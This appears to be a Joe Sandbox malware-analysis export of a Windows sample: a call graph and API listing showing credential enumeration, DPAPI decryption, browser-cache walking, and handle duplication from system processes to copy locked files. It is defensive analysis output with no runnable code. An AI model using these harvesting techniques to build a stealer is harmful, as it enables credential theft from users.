38316->38269 38317 445f5c 
38318 40aebe FindClose 38317->38318 38318->38278 38319 40add4 2 API calls 38319->38321 38320 40b2cc 27 API calls 38320->38321 38321->38315 38321->38317 38321->38319 38321->38320 38322 409d1f 6 API calls 38321->38322 38324 445f3a 38321->38324 38725 409b98 GetFileAttributesW 38321->38725 38322->38321 38726 445093 23 API calls 38324->38726 38326->38123 38327->38125 38328->38123 38329->38118 38331 40c775 38330->38331 38728 40b1ab free free 38331->38728 38333 40c788 38729 40b1ab free free 38333->38729 38335 40c790 38730 40b1ab free free 38335->38730 38337 40c798 38338 40aa04 free 38337->38338 38339 40c7a0 38338->38339 38731 40c274 memset 38339->38731 38344 40a8ab 9 API calls 38345 40c7c3 38344->38345 38346 40a8ab 9 API calls 38345->38346 38347 40c7d0 38346->38347 38760 40c3c3 38347->38760 38351 40c877 38360 40bdb0 38351->38360 38352 40c86c 38802 4053fe 39 API calls 38352->38802 38358 40c7e5 38358->38351 38358->38352 38359 40c634 50 API calls 38358->38359 38785 40a706 38358->38785 38359->38358 39031 404363 38360->39031 38364 40bdee 38367 40b2cc 27 API calls 38364->38367 38369 40bf5d 38364->38369 38365 40bddf CredEnumerateW 38365->38364 38368 40be02 wcslen 38367->38368 38368->38369 38377 40be1e 38368->38377 39051 40440c 38369->39051 38370 40be26 wcsncmp 38370->38377 38373 40be7d memset 38374 40bea7 memcpy 38373->38374 38373->38377 38375 40bf11 wcschr 38374->38375 38374->38377 38375->38377 38376 40b2cc 27 API calls 38378 40bef6 _wcsnicmp 38376->38378 38377->38369 38377->38370 38377->38373 38377->38374 38377->38375 38377->38376 38379 40bf43 LocalFree 38377->38379 39054 40bd5d 28 API calls 38377->39054 39055 404423 38377->39055 38378->38375 38378->38377 38379->38377 38380 4135f7 39070 4135e0 38380->39070 38383 40b2cc 27 API calls 38384 41360d 38383->38384 38385 40a804 8 API calls 38384->38385 38386 413613 38385->38386 38387 41361b 38386->38387 38388 41363e 38386->38388 38389 40b273 27 API calls 38387->38389 38390 4135e0 FreeLibrary 38388->38390 38391 413625 GetProcAddress 
38389->38391 38392 413643 38390->38392 38391->38388 38393 413648 38391->38393 38392->38152 38394 413658 38393->38394 38395 4135e0 FreeLibrary 38393->38395 38394->38152 38396 413666 38395->38396 38396->38152 39073 4449b9 38397->39073 38400 444c1f 38400->38133 38401 4449b9 42 API calls 38403 444b4b 38401->38403 38402 444c15 38405 4449b9 42 API calls 38402->38405 38403->38402 39094 444972 GetVersionExW 38403->39094 38405->38400 38406 444b99 memcmp 38411 444b8c 38406->38411 38407 444c0b 39098 444a85 42 API calls 38407->39098 38411->38406 38411->38407 39095 444aa5 42 API calls 38411->39095 39096 40a7a0 GetVersionExW 38411->39096 39097 444a85 42 API calls 38411->39097 38414 40399d 38413->38414 39099 403a16 38414->39099 38417 403a12 wcsrchr 38417->38150 38418 4039a3 38421 4039f4 38418->38421 38423 403a09 38418->38423 39110 40a02c CreateFileW 38418->39110 38422 4099c6 2 API calls 38421->38422 38421->38423 38422->38423 39113 40b1ab free free 38423->39113 38425 414c2e 17 API calls 38424->38425 38426 404048 38425->38426 38427 414c2e 17 API calls 38426->38427 38428 404056 38427->38428 38429 409d1f 6 API calls 38428->38429 38430 404073 38429->38430 38431 409d1f 6 API calls 38430->38431 38432 40408e 38431->38432 38433 409d1f 6 API calls 38432->38433 38434 4040a6 38433->38434 38435 403af5 20 API calls 38434->38435 38436 4040ba 38435->38436 38437 403af5 20 API calls 38436->38437 38438 4040cb 38437->38438 39140 40414f memset 38438->39140 38440 404140 39154 40b1ab free free 38440->39154 38442 4040ec memset 38445 4040e0 38442->38445 38443 404148 38443->38205 38444 4099c6 2 API calls 38444->38445 38445->38440 38445->38442 38445->38444 38446 40a8ab 9 API calls 38445->38446 38446->38445 39167 40a6e6 WideCharToMultiByte 38447->39167 38449 4087ed 39168 4095d9 memset 38449->39168 38452 408809 memset memset memset memset memset 38453 40b2cc 27 API calls 38452->38453 38454 4088a1 38453->38454 38455 409d1f 6 API calls 38454->38455 38456 4088b1 38455->38456 38457 40b2cc 27 API calls 
38456->38457 38458 4088c0 38457->38458 38459 409d1f 6 API calls 38458->38459 38460 4088d0 38459->38460 38461 40b2cc 27 API calls 38460->38461 38462 4088df 38461->38462 38463 409d1f 6 API calls 38462->38463 38464 4088ef 38463->38464 38465 40b2cc 27 API calls 38464->38465 38466 4088fe 38465->38466 38467 409d1f 6 API calls 38466->38467 38468 40890e 38467->38468 38469 40b2cc 27 API calls 38468->38469 38470 40891d 38469->38470 38480 408953 38480->38205 38499 40b633 free 38498->38499 38500 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38499->38500 38501 413f00 Process32NextW 38500->38501 38502 413da5 OpenProcess 38501->38502 38503 413f17 CloseHandle 38501->38503 38504 413df3 memset 38502->38504 38508 413eb0 38502->38508 38503->38244 39593 413f27 38504->39593 38506 413ebf free 38506->38508 38507 413e1f 38510 413e37 GetModuleHandleW 38507->38510 39598 413959 38507->39598 39614 413ca4 38507->39614 38508->38501 38508->38506 38509 4099f4 3 API calls 38508->38509 38509->38508 38510->38507 38512 413e46 GetProcAddress 38510->38512 38512->38507 38514 413ea2 CloseHandle 38514->38508 38516 414c2e 17 API calls 38515->38516 38517 403eb7 38516->38517 38518 414c2e 17 API calls 38517->38518 38519 403ec5 38518->38519 38520 409d1f 6 API calls 38519->38520 38521 403ee2 38520->38521 38522 409d1f 6 API calls 38521->38522 38523 403efd 38522->38523 38524 409d1f 6 API calls 38523->38524 38525 403f15 38524->38525 38526 403af5 20 API calls 38525->38526 38527 403f29 38526->38527 38528 403af5 20 API calls 38527->38528 38529 403f3a 38528->38529 38530 40414f 33 API calls 38529->38530 38536 403f4f 38530->38536 38531 403faf 39628 40b1ab free free 38531->39628 38533 403f5b memset 38533->38536 38534 403fb7 38534->38190 38535 4099c6 2 API calls 38535->38536 38536->38531 38536->38533 38536->38535 38537 40a8ab 9 API calls 38536->38537 38537->38536 38539 414c2e 17 API calls 38538->38539 38540 403d26 38539->38540 38541 414c2e 17 API calls 38540->38541 38542 403d34 38541->38542 38543 409d1f 6 API 
calls 38542->38543 38544 403d51 38543->38544 38545 409d1f 6 API calls 38544->38545 38546 403d6c 38545->38546 38547 409d1f 6 API calls 38546->38547 38548 403d84 38547->38548 38549 403af5 20 API calls 38548->38549 38550 403d98 38549->38550 38551 403af5 20 API calls 38550->38551 38552 403da9 38551->38552 38553 40414f 33 API calls 38552->38553 38559 403dbe 38553->38559 38554 403e1e 39629 40b1ab free free 38554->39629 38556 403dca memset 38556->38559 38557 403e26 38557->38193 38558 4099c6 2 API calls 38558->38559 38559->38554 38559->38556 38559->38558 38560 40a8ab 9 API calls 38559->38560 38560->38559 38562 414b81 9 API calls 38561->38562 38563 414c40 38562->38563 38564 414c73 memset 38563->38564 39630 409cea 38563->39630 38566 414c94 38564->38566 39633 414592 RegOpenKeyExW 38566->39633 38568 414c64 SHGetSpecialFolderPathW 38570 414d0b 38568->38570 38570->38185 38571 414cf4 wcscpy 38571->38570 38572 414cc1 38572->38571 39634 414bb0 wcscpy 38572->39634 38574 414cd2 39635 4145ac RegQueryValueExW 38574->39635 38576 414ce9 RegCloseKey 38576->38571 38578 409d62 38577->38578 38579 409d43 wcscpy 38577->38579 38578->38224 38580 409719 2 API calls 38579->38580 38581 409d51 wcscat 38580->38581 38581->38578 38583 40aebe FindClose 38582->38583 38584 40ae21 38583->38584 38585 4099c6 2 API calls 38584->38585 38586 40ae35 38585->38586 38587 409d1f 6 API calls 38586->38587 38588 40ae49 38587->38588 38588->38289 38590 40ade0 38589->38590 38591 40ae0f 38589->38591 38590->38591 38592 40ade7 wcscmp 38590->38592 38591->38289 38592->38591 38593 40adfe wcscmp 38592->38593 38593->38591 38595 40ae18 9 API calls 38594->38595 38597 4453c4 38595->38597 38596 40ae51 9 API calls 38596->38597 38597->38596 38598 4453f3 38597->38598 38599 40add4 2 API calls 38597->38599 38602 445403 254 API calls 38597->38602 38600 40aebe FindClose 38598->38600 38599->38597 38601 4453fe 38600->38601 38601->38289 38602->38597 38604 40ae7b FindNextFileW 38603->38604 38605 40ae5c FindFirstFileW 38603->38605 38606 40ae94 
38604->38606 38607 40ae8f 38604->38607 38605->38606 38609 40aeb6 38606->38609 38610 409d1f 6 API calls 38606->38610 38608 40aebe FindClose 38607->38608 38608->38606 38609->38289 38610->38609 38611->38173 38612->38154 38613->38247 38614->38231 38615->38231 38616->38262 38618 409c89 38617->38618 38618->38285 38619->38314 38621 413d39 38620->38621 38622 413d2f FreeLibrary 38620->38622 38623 40b633 free 38621->38623 38622->38621 38624 413d42 38623->38624 38625 40b633 free 38624->38625 38626 413d4a 38625->38626 38626->38146 38627->38153 38628->38141 38629->38217 38631 44db70 38630->38631 38632 40b6fc memset 38631->38632 38633 409c70 2 API calls 38632->38633 38634 40b732 wcsrchr 38633->38634 38635 40b743 38634->38635 38636 40b746 memset 38634->38636 38635->38636 38637 40b2cc 27 API calls 38636->38637 38638 40b76f 38637->38638 38639 409d1f 6 API calls 38638->38639 38640 40b783 38639->38640 39636 409b98 GetFileAttributesW 38640->39636 38642 40b792 38643 40b7c2 38642->38643 38644 409c70 2 API calls 38642->38644 39637 40bb98 38643->39637 38646 40b7a5 38644->38646 38650 40b2cc 27 API calls 38646->38650 38648 40b837 CloseHandle 38652 40b83e memset 38648->38652 38649 40b817 38651 409a45 3 API calls 38649->38651 38653 40b7b2 38650->38653 38654 40b827 CopyFileW 38651->38654 39670 40a6e6 WideCharToMultiByte 38652->39670 38656 409d1f 6 API calls 38653->38656 38654->38652 38656->38643 38657 40b866 38658 444432 121 API calls 38657->38658 38659 40b879 38658->38659 38660 40bad5 38659->38660 38661 40b273 27 API calls 38659->38661 38662 40baeb 38660->38662 38663 40bade DeleteFileW 38660->38663 38664 40b89a 38661->38664 38665 40b04b ??3@YAXPAX 38662->38665 38663->38662 38667 438552 134 API calls 38664->38667 38666 40baf3 38665->38666 38666->38143 38668 40b8a4 38667->38668 38669 40bacd 38668->38669 38671 4251c4 137 API calls 38668->38671 38670 443d90 111 API calls 38669->38670 38670->38660 38693 40b8b8 38671->38693 38672 40bac6 39680 424f26 123 API calls 38672->39680 38673 40b8bd memset 
39671 425413 17 API calls 38673->39671 38676 425413 17 API calls 38676->38693 38679 40a71b MultiByteToWideChar 38679->38693 38682 40b9b5 memcmp 38682->38693 38683 4099c6 2 API calls 38683->38693 38684 404423 38 API calls 38684->38693 38687 4251c4 137 API calls 38687->38693 38688 40bb3e memset memcpy 39681 40a734 MultiByteToWideChar 38688->39681 38690 40bb88 LocalFree 38690->38693 38693->38672 38693->38673 38693->38676 38693->38679 38693->38682 38693->38683 38693->38684 38693->38687 38693->38688 38694 40ba5f memcmp 38693->38694 38695 40a734 MultiByteToWideChar 38693->38695 39672 4253ef 16 API calls 38693->39672 39673 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38693->39673 39674 4253af 17 API calls 38693->39674 39675 4253cf 17 API calls 38693->39675 39676 447280 memset 38693->39676 39677 447960 memset memcpy memcpy memcpy 38693->39677 39678 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38693->39678 39679 447920 memcpy memcpy memcpy 38693->39679 38694->38693 38695->38693 38696->38220 38698 40aed1 38697->38698 38699 40aec7 FindClose 38697->38699 38698->38157 38699->38698 38701 4099d7 38700->38701 38702 4099da memcpy 38700->38702 38701->38702 38702->38204 38704 40b2cc 27 API calls 38703->38704 38705 44543f 38704->38705 38706 409d1f 6 API calls 38705->38706 38707 44544f 38706->38707 39768 409b98 GetFileAttributesW 38707->39768 38709 44545e 38710 445476 38709->38710 38711 40b6ef 253 API calls 38709->38711 38712 40b2cc 27 API calls 38710->38712 38711->38710 38713 445482 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 445492 38714->38715 39769 409b98 GetFileAttributesW 38715->39769 38717 4454a1 38718 4454b9 38717->38718 38719 40b6ef 253 API calls 38717->38719 38718->38229 38719->38718 38720->38228 38721->38252 38722->38255 38723->38292 38724->38274 38725->38321 38726->38321 38727->38303 38728->38333 38729->38335 38730->38337 38732 414c2e 17 API calls 38731->38732 38733 40c2ae 38732->38733 38803 40c1d3 38733->38803 38738 40c3be 38755 40a8ab 38738->38755 38739 40afcf 
2 API calls 38740 40c2fd FindFirstUrlCacheEntryW 38739->38740 38741 40c3b6 38740->38741 38742 40c31e wcschr 38740->38742 38743 40b04b ??3@YAXPAX 38741->38743 38744 40c331 38742->38744 38745 40c35e FindNextUrlCacheEntryW 38742->38745 38743->38738 38747 40a8ab 9 API calls 38744->38747 38745->38742 38746 40c373 GetLastError 38745->38746 38748 40c3ad FindCloseUrlCache 38746->38748 38749 40c37e 38746->38749 38750 40c33e wcschr 38747->38750 38748->38741 38751 40afcf 2 API calls 38749->38751 38750->38745 38752 40c34f 38750->38752 38753 40c391 FindNextUrlCacheEntryW 38751->38753 38754 40a8ab 9 API calls 38752->38754 38753->38742 38753->38748 38754->38745 38958 40a97a 38755->38958 38758 40a8cc 38758->38344 38759 40a8d0 7 API calls 38759->38758 38963 40b1ab free free 38760->38963 38762 40c3dd 38763 40b2cc 27 API calls 38762->38763 38764 40c3e7 38763->38764 38964 414592 RegOpenKeyExW 38764->38964 38766 40c3f4 38767 40c50e 38766->38767 38768 40c3ff 38766->38768 38782 405337 38767->38782 38769 40a9ce 4 API calls 38768->38769 38770 40c418 memset 38769->38770 38965 40aa1d 38770->38965 38773 40c471 38775 40c47a _wcsupr 38773->38775 38774 40c505 RegCloseKey 38774->38767 38776 40a8d0 7 API calls 38775->38776 38777 40c498 38776->38777 38778 40a8d0 7 API calls 38777->38778 38779 40c4ac memset 38778->38779 38780 40aa1d 38779->38780 38781 40c4e4 RegEnumValueW 38780->38781 38781->38774 38781->38775 38967 405220 38782->38967 38786 4099c6 2 API calls 38785->38786 38787 40a714 _wcslwr 38786->38787 38788 40c634 38787->38788 39024 405361 38788->39024 38791 40c65c wcslen 39027 4053b6 39 API calls 38791->39027 38792 40c71d wcslen 38792->38358 38794 40c677 38795 40c713 38794->38795 39028 40538b 39 API calls 38794->39028 39030 4053df 39 API calls 38795->39030 38798 40c6a5 38798->38795 38799 40c6a9 memset 38798->38799 38800 40c6d3 38799->38800 39029 40c589 44 API calls 38800->39029 38802->38351 38804 40ae18 9 API calls 38803->38804 38810 40c210 38804->38810 38805 40ae51 9 API calls 38805->38810 
38806 40c264 38807 40aebe FindClose 38806->38807 38809 40c26f 38807->38809 38808 40add4 2 API calls 38808->38810 38815 40e5ed memset memset 38809->38815 38810->38805 38810->38806 38810->38808 38811 40c231 _wcsicmp 38810->38811 38812 40c1d3 35 API calls 38810->38812 38811->38810 38813 40c248 38811->38813 38812->38810 38828 40c084 22 API calls 38813->38828 38816 414c2e 17 API calls 38815->38816 38817 40e63f 38816->38817 38818 409d1f 6 API calls 38817->38818 38819 40e658 38818->38819 38829 409b98 GetFileAttributesW 38819->38829 38821 40e667 38823 409d1f 6 API calls 38821->38823 38825 40e680 38821->38825 38823->38825 38824 40e68f 38826 40c2d8 38824->38826 38831 40e4b2 38824->38831 38830 409b98 GetFileAttributesW 38825->38830 38826->38738 38826->38739 38828->38810 38829->38821 38830->38824 38852 40e01e 38831->38852 38833 40e593 38834 40e5b0 38833->38834 38835 40e59c DeleteFileW 38833->38835 38836 40b04b ??3@YAXPAX 38834->38836 38835->38834 38838 40e5bb 38836->38838 38837 40e521 38837->38833 38875 40e175 38837->38875 38840 40e5c4 CloseHandle 38838->38840 38841 40e5cc 38838->38841 38840->38841 38843 40b633 free 38841->38843 38842 40e573 38845 40e584 38842->38845 38846 40e57c CloseHandle 38842->38846 38844 40e5db 38843->38844 38849 40b633 free 38844->38849 38896 40b1ab free free 38845->38896 38846->38845 38848 40e540 38848->38842 38895 40e2ab 30 API calls 38848->38895 38850 40e5e3 38849->38850 38850->38826 38897 406214 38852->38897 38855 40e16b 38855->38837 38858 40afcf 2 API calls 38859 40e08d OpenProcess 38858->38859 38860 40e0a4 GetCurrentProcess DuplicateHandle 38859->38860 38864 40e152 38859->38864 38861 40e0d0 GetFileSize 38860->38861 38862 40e14a CloseHandle 38860->38862 38933 409a45 GetTempPathW 38861->38933 38862->38864 38863 40e160 38867 40b04b ??3@YAXPAX 38863->38867 38864->38863 38866 406214 22 API calls 38864->38866 38866->38863 38867->38855 38868 40e0ea 38936 4096dc CreateFileW 38868->38936 38870 40e0f1 CreateFileMappingW 38871 40e140 CloseHandle CloseHandle 
38870->38871 38872 40e10b MapViewOfFile 38870->38872 38871->38862 38873 40e13b CloseHandle 38872->38873 38874 40e11f WriteFile UnmapViewOfFile 38872->38874 38873->38871 38874->38873 38876 40e18c 38875->38876 38937 406b90 38876->38937 38879 40e1a7 memset 38885 40e1e8 38879->38885 38880 40e299 38947 4069a3 38880->38947 38886 40e283 38885->38886 38887 40dd50 _wcsicmp 38885->38887 38893 40e244 _snwprintf 38885->38893 38954 406e8f 13 API calls 38885->38954 38955 40742e 8 API calls 38885->38955 38956 40aae3 wcslen wcslen _memicmp 38885->38956 38957 406b53 SetFilePointerEx ReadFile 38885->38957 38888 40e291 38886->38888 38889 40e288 free 38886->38889 38887->38885 38890 40aa04 free 38888->38890 38889->38888 38890->38880 38894 40a8d0 7 API calls 38893->38894 38894->38885 38895->38848 38896->38833 38898 406294 CloseHandle 38897->38898 38899 406224 38898->38899 38900 4096c3 CreateFileW 38899->38900 38901 40622d 38900->38901 38902 406281 GetLastError 38901->38902 38904 40a2ef ReadFile 38901->38904 38903 40625a 38902->38903 38903->38855 38908 40dd85 memset 38903->38908 38905 406244 38904->38905 38905->38902 38906 40624b 38905->38906 38906->38903 38907 406777 19 API calls 38906->38907 38907->38903 38909 409bca GetModuleFileNameW 38908->38909 38910 40ddbe CreateFileW 38909->38910 38913 40ddf1 38910->38913 38911 40afcf ??2@YAPAXI ??3@YAXPAX 38911->38913 38912 41352f 9 API calls 38912->38913 38913->38911 38913->38912 38914 40de0b NtQuerySystemInformation 38913->38914 38915 40de3b CloseHandle GetCurrentProcessId 38913->38915 38914->38913 38916 40de54 38915->38916 38917 413d4c 46 API calls 38916->38917 38926 40de88 38917->38926 38918 40e00c 38919 413d29 free FreeLibrary 38918->38919 38920 40e014 38919->38920 38920->38855 38920->38858 38921 40dea9 _wcsicmp 38922 40dee7 OpenProcess 38921->38922 38923 40debd _wcsicmp 38921->38923 38922->38926 38923->38922 38924 40ded0 _wcsicmp 38923->38924 38924->38922 38924->38926 38925 40dfef CloseHandle 38925->38926 38926->38918 38926->38921 
38926->38925 38927 40df78 38926->38927 38928 40df23 GetCurrentProcess DuplicateHandle 38926->38928 38931 40df8f CloseHandle 38926->38931 38927->38925 38927->38931 38932 40dfae _wcsicmp 38927->38932 38928->38926 38929 40df4c memset 38928->38929 38930 41352f 9 API calls 38929->38930 38930->38926 38931->38927 38932->38926 38932->38927 38934 409a74 GetTempFileNameW 38933->38934 38935 409a66 GetWindowsDirectoryW 38933->38935 38934->38868 38935->38934 38936->38870 38938 406bd5 38937->38938 38941 406bad 38937->38941 38940 4066bf free malloc memcpy free free 38938->38940 38946 406c0f 38938->38946 38939 406bba _wcsicmp 38939->38938 38939->38941 38942 406be5 38940->38942 38941->38938 38941->38939 38943 40afcf ??2@YAPAXI ??3@YAXPAX 38942->38943 38942->38946 38944 406bff 38943->38944 38945 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 38944->38945 38945->38946 38946->38879 38946->38880 38948 4069c4 ??3@YAXPAX 38947->38948 38949 4069af 38948->38949 38950 40b633 free 38949->38950 38951 4069ba 38950->38951 38952 40b04b ??3@YAXPAX 38951->38952 38953 4069c2 38952->38953 38953->38848 38954->38885 38955->38885 38956->38885 38957->38885 38960 40a980 38958->38960 38959 40a8bb 38959->38758 38959->38759 38960->38959 38961 40a995 _wcsicmp 38960->38961 38962 40a99c wcscmp 38960->38962 38961->38960 38962->38960 38963->38762 38964->38766 38966 40aa23 RegEnumValueW 38965->38966 38966->38773 38966->38774 38968 405335 38967->38968 38969 40522a 38967->38969 38968->38358 38970 40b2cc 27 API calls 38969->38970 38971 405234 38970->38971 38972 40a804 8 API calls 38971->38972 38973 40523a 38972->38973 39012 40b273 38973->39012 38975 405248 _mbscpy _mbscat GetProcAddress 38976 40b273 27 API calls 38975->38976 38977 405279 38976->38977 39015 405211 GetProcAddress 38977->39015 38979 405282 38980 40b273 27 API calls 38979->38980 38981 40528f 38980->38981 39016 405211 GetProcAddress 38981->39016 38983 405298 38984 40b273 27 API calls 38983->38984 38985 4052a5 38984->38985 39017 405211 
GetProcAddress 38985->39017 38987 4052ae 38988 40b273 27 API calls 38987->38988 38989 4052bb 38988->38989 39018 405211 GetProcAddress 38989->39018 38991 4052c4 38992 40b273 27 API calls 38991->38992 38993 4052d1 38992->38993 39019 405211 GetProcAddress 38993->39019 38995 4052da 38996 40b273 27 API calls 38995->38996 38997 4052e7 38996->38997 39020 405211 GetProcAddress 38997->39020 38999 4052f0 39000 40b273 27 API calls 38999->39000 39001 4052fd 39000->39001 39021 405211 GetProcAddress 39001->39021 39003 405306 39004 40b273 27 API calls 39003->39004 39005 405313 39004->39005 39022 405211 GetProcAddress 39005->39022 39007 40531c 39013 40b58d 27 API calls 39012->39013 39014 40b18c 39013->39014 39014->38975 39015->38979 39016->38983 39017->38987 39018->38991 39019->38995 39020->38999 39021->39003 39022->39007 39025 405220 39 API calls 39024->39025 39026 405369 39025->39026 39026->38791 39026->38792 39027->38794 39028->38798 39029->38795 39030->38792 39032 40440c FreeLibrary 39031->39032 39033 40436d 39032->39033 39034 40a804 8 API calls 39033->39034 39035 404377 39034->39035 39036 404383 39035->39036 39037 404405 39035->39037 39038 40b273 27 API calls 39036->39038 39037->38364 39037->38365 39037->38369 39039 40438d GetProcAddress 39038->39039 39040 40b273 27 API calls 39039->39040 39041 4043a7 GetProcAddress 39040->39041 39042 40b273 27 API calls 39041->39042 39043 4043ba GetProcAddress 39042->39043 39044 40b273 27 API calls 39043->39044 39045 4043ce GetProcAddress 39044->39045 39046 40b273 27 API calls 39045->39046 39047 4043e2 GetProcAddress 39046->39047 39048 4043f1 39047->39048 39049 4043f7 39048->39049 39050 40440c FreeLibrary 39048->39050 39049->39037 39050->39037 39052 404413 FreeLibrary 39051->39052 39053 40441e 39051->39053 39052->39053 39053->38380 39054->38377 39056 40447e 39055->39056 39057 40442e 39055->39057 39058 404485 CryptUnprotectData 39056->39058 39059 40449c 39056->39059 39060 40b2cc 27 API calls 39057->39060 39058->39059 39059->38377 39061 404438 
39060->39061 39062 40a804 8 API calls 39061->39062 39063 40443e 39062->39063 39064 404445 39063->39064 39065 404467 39063->39065 39066 40b273 27 API calls 39064->39066 39065->39056 39067 404475 FreeLibrary 39065->39067 39068 40444f GetProcAddress 39066->39068 39067->39056 39068->39065 39069 404460 39068->39069 39069->39065 39071 4135f6 39070->39071 39072 4135eb FreeLibrary 39070->39072 39071->38383 39072->39071 39074 4449c4 39073->39074 39075 444a52 39073->39075 39076 40b2cc 27 API calls 39074->39076 39075->38400 39075->38401 39077 4449cb 39076->39077 39078 40a804 8 API calls 39077->39078 39079 4449d1 39078->39079 39080 40b273 27 API calls 39079->39080 39081 4449dc GetProcAddress 39080->39081 39082 40b273 27 API calls 39081->39082 39083 4449f3 GetProcAddress 39082->39083 39084 40b273 27 API calls 39083->39084 39085 444a04 GetProcAddress 39084->39085 39086 40b273 27 API calls 39085->39086 39087 444a15 GetProcAddress 39086->39087 39094->38411 39095->38411 39096->38411 39097->38411 39098->38402 39100 403a29 39099->39100 39114 403bed memset memset 39100->39114 39102 403a2f 39103 403ae7 39102->39103 39104 403a3f memset 39102->39104 39107 409b98 GetFileAttributesW 39102->39107 39108 40a8d0 7 API calls 39102->39108 39109 409d1f 6 API calls 39102->39109 39127 40b1ab free free 39103->39127 39104->39102 39106 403aef 39106->38418 39107->39102 39108->39102 39109->39102 39111 40a051 GetFileTime CloseHandle 39110->39111 39112 4039ca CompareFileTime 39110->39112 39111->39112 39112->38418 39113->38417 39115 414c2e 17 API calls 39114->39115 39116 403c38 39115->39116 39117 409719 2 API calls 39116->39117 39118 403c3f wcscat 39117->39118 39119 414c2e 17 API calls 39118->39119 39120 403c61 39119->39120 39121 409719 2 API calls 39120->39121 39122 403c68 wcscat 39121->39122 39128 403af5 39122->39128 39125 403af5 20 API calls 39126 403c95 39125->39126 39126->39102 39127->39106 39129 403b02 39128->39129 39130 40ae18 9 API calls 39129->39130 39138 403b37 39130->39138 39131 403bdb 39132 

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                            APIs
                                            • memset.MSVCRT ref: 0040DDAD
                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                            • memset.MSVCRT ref: 0040DF5F
                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                            • API String ID: 708747863-3398334509
                                            • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
